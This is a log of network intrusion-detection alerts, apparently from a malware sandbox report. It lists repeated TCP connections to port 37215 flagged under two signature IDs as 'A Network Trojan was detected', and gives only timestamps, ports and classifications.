            Timestamp:05/28/24-09:57:22.918899
            SID:2835222
            Source Port:51422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.413959
            SID:2835222
            Source Port:37608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330953
            SID:2829579
            Source Port:42314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988848
            SID:2835222
            Source Port:58288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434288
            SID:2835222
            Source Port:39396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676401
            SID:2835222
            Source Port:50244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926850
            SID:2829579
            Source Port:59566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278016
            SID:2829579
            Source Port:37548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.308253
            SID:2835222
            Source Port:33636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646548
            SID:2829579
            Source Port:46068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.522733
            SID:2835222
            Source Port:38970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821759
            SID:2829579
            Source Port:40708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808719
            SID:2829579
            Source Port:50924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069774
            SID:2829579
            Source Port:37572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.551871
            SID:2835222
            Source Port:36194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261363
            SID:2829579
            Source Port:54972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986949
            SID:2835222
            Source Port:59536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745014
            SID:2829579
            Source Port:45510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849004
            SID:2829579
            Source Port:55240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773786
            SID:2835222
            Source Port:43800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896125
            SID:2835222
            Source Port:52234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055184
            SID:2829579
            Source Port:33932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923243
            SID:2829579
            Source Port:40296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.780190
            SID:2835222
            Source Port:58350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.493970
            SID:2829579
            Source Port:60464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862944
            SID:2829579
            Source Port:36344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771241
            SID:2835222
            Source Port:50800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277059
            SID:2835222
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870683
            SID:2829579
            Source Port:54456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.554934
            SID:2829579
            Source Port:47202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809618
            SID:2829579
            Source Port:46654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320964
            SID:2835222
            Source Port:46486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893601
            SID:2835222
            Source Port:44448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808561
            SID:2835222
            Source Port:54336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944462
            SID:2829579
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869159
            SID:2829579
            Source Port:36832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549888
            SID:2835222
            Source Port:34090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777843
            SID:2829579
            Source Port:45274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.295758
            SID:2835222
            Source Port:52442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782625
            SID:2835222
            Source Port:48334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299864
            SID:2835222
            Source Port:37460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058329
            SID:2835222
            Source Port:38542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771389
            SID:2835222
            Source Port:34460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067671
            SID:2835222
            Source Port:50394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935479
            SID:2829579
            Source Port:57856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771281
            SID:2835222
            Source Port:58628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857614
            SID:2835222
            Source Port:58830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938037
            SID:2835222
            Source Port:55814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.805959
            SID:2829579
            Source Port:41050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605324
            SID:2835222
            Source Port:40586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815606
            SID:2835222
            Source Port:38896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916405
            SID:2835222
            Source Port:52340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854100
            SID:2835222
            Source Port:54698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832544
            SID:2829579
            Source Port:47542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371419
            SID:2829579
            Source Port:37882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776699
            SID:2835222
            Source Port:37618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936157
            SID:2835222
            Source Port:57860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723753
            SID:2835222
            Source Port:39708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935268
            SID:2835222
            Source Port:37190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073321
            SID:2835222
            Source Port:37388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307660
            SID:2835222
            Source Port:53400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027800
            SID:2829579
            Source Port:45814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843747
            SID:2829579
            Source Port:56460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030780
            SID:2835222
            Source Port:54542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052236
            SID:2829579
            Source Port:58358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290766
            SID:2829579
            Source Port:60360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809516
            SID:2829579
            Source Port:59264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951603
            SID:2835222
            Source Port:54814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961108
            SID:2835222
            Source Port:43592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459674
            SID:2829579
            Source Port:45112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880884
            SID:2835222
            Source Port:41228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816783
            SID:2829579
            Source Port:34442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543473
            SID:2829579
            Source Port:47642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066714
            SID:2835222
            Source Port:60290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447025
            SID:2829579
            Source Port:55958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434222
            SID:2835222
            Source Port:40886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296223
            SID:2829579
            Source Port:59814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807410
            SID:2835222
            Source Port:54484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290171
            SID:2835222
            Source Port:37186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851027
            SID:2835222
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076796
            SID:2835222
            Source Port:59046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322814
            SID:2835222
            Source Port:53942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730030
            SID:2835222
            Source Port:57544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053812
            SID:2829579
            Source Port:39546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569014
            SID:2835222
            Source Port:38554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862984
            SID:2829579
            Source Port:40614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261988
            SID:2835222
            Source Port:48036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040439
            SID:2835222
            Source Port:57928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623508
            SID:2835222
            Source Port:44888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.572574
            SID:2829579
            Source Port:56898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290909
            SID:2835222
            Source Port:51920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061086
            SID:2835222
            Source Port:42914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946696
            SID:2829579
            Source Port:47218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855788
            SID:2829579
            Source Port:47616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943129
            SID:2835222
            Source Port:48134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862811
            SID:2835222
            Source Port:36450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822134
            SID:2835222
            Source Port:55808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060231
            SID:2829579
            Source Port:57710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851069
            SID:2835222
            Source Port:35420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375224
            SID:2835222
            Source Port:39380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543749
            SID:2835222
            Source Port:36414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952106
            SID:2829579
            Source Port:54320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611170
            SID:2835222
            Source Port:58586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790501
            SID:2829579
            Source Port:54850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805071
            SID:2829579
            Source Port:55398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919049
            SID:2829579
            Source Port:35424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.538241
            SID:2829579
            Source Port:44622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824543
            SID:2835222
            Source Port:39246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.325169
            SID:2829579
            Source Port:35624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290275
            SID:2835222
            Source Port:42008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923127
            SID:2835222
            Source Port:42482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043122
            SID:2829579
            Source Port:41988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381402
            SID:2829579
            Source Port:39766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434414
            SID:2835222
            Source Port:58656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913136
            SID:2835222
            Source Port:39052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424067
            SID:2835222
            Source Port:38920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930097
            SID:2835222
            Source Port:32916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319980
            SID:2835222
            Source Port:52094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339958
            SID:2829579
            Source Port:33934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646343
            SID:2829579
            Source Port:48958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451848
            SID:2835222
            Source Port:46892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948514
            SID:2835222
            Source Port:39150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744294
            SID:2835222
            Source Port:34692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880502
            SID:2829579
            Source Port:42168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697866
            SID:2829579
            Source Port:60340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.951672
            SID:2829579
            Source Port:40902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760155
            SID:2835222
            Source Port:42818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904397
            SID:2835222
            Source Port:48292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753359
            SID:2829579
            Source Port:52556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810998
            SID:2829579
            Source Port:59216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457404
            SID:2829579
            Source Port:45070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893882
            SID:2835222
            Source Port:45198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.947489
            SID:2835222
            Source Port:34292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668975
            SID:2835222
            Source Port:53486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847120
            SID:2835222
            Source Port:41130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880730
            SID:2835222
            Source Port:33456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.246036
            SID:2835222
            Source Port:55378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290024
            SID:2835222
            Source Port:60210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716910
            SID:2835222
            Source Port:49418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581979
            SID:2835222
            Source Port:60738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776230
            SID:2829579
            Source Port:49826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919381
            SID:2835222
            Source Port:56614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321815
            SID:2829579
            Source Port:47310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040157
            SID:2835222
            Source Port:60460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808510
            SID:2835222
            Source Port:38540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849552
            SID:2829579
            Source Port:54968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873498
            SID:2829579
            Source Port:48070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777770
            SID:2829579
            Source Port:40100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773671
            SID:2835222
            Source Port:52234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280810
            SID:2829579
            Source Port:41598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473332
            SID:2829579
            Source Port:44780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685637
            SID:2829579
            Source Port:37080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956188
            SID:2835222
            Source Port:52332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.542901
            SID:2829579
            Source Port:54282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885687
            SID:2829579
            Source Port:58272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.900065
            SID:2835222
            Source Port:59368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.463514
            SID:2835222
            Source Port:44714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908990
            SID:2829579
            Source Port:51394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778251
            SID:2829579
            Source Port:39908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901300
            SID:2835222
            Source Port:34224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582666
            SID:2829579
            Source Port:57512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861682
            SID:2829579
            Source Port:60132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961288
            SID:2829579
            Source Port:45046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876164
            SID:2835222
            Source Port:38314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892415
            SID:2829579
            Source Port:47324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880331
            SID:2829579
            Source Port:45760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995416
            SID:2829579
            Source Port:35554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568492
            SID:2829579
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.077931
            SID:2835222
            Source Port:57356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741300
            SID:2829579
            Source Port:43866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.964824
            SID:2835222
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444912
            SID:2835222
            Source Port:46112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107952
            SID:2829579
            Source Port:38230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312147
            SID:2829579
            Source Port:60824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.528119
            SID:2835222
            Source Port:60466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056844
            SID:2829579
            Source Port:47594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058017
            SID:2829579
            Source Port:58264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945462
            SID:2835222
            Source Port:46618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989891
            SID:2835222
            Source Port:56328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777348
            SID:2835222
            Source Port:60392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.960396
            SID:2835222
            Source Port:39318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026886
            SID:2835222
            Source Port:58464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756063
            SID:2829579
            Source Port:55484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378544
            SID:2829579
            Source Port:34412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030716
            SID:2829579
            Source Port:35690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754785
            SID:2829579
            Source Port:53484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026900
            SID:2829579
            Source Port:51858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311196
            SID:2835222
            Source Port:59026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532726
            SID:2835222
            Source Port:53218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741961
            SID:2835222
            Source Port:59750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748356
            SID:2829579
            Source Port:44098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833388
            SID:2829579
            Source Port:46294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861973
            SID:2835222
            Source Port:51462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966692
            SID:2829579
            Source Port:42576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936131
            SID:2835222
            Source Port:53956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857113
            SID:2835222
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562989
            SID:2829579
            Source Port:41922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778839
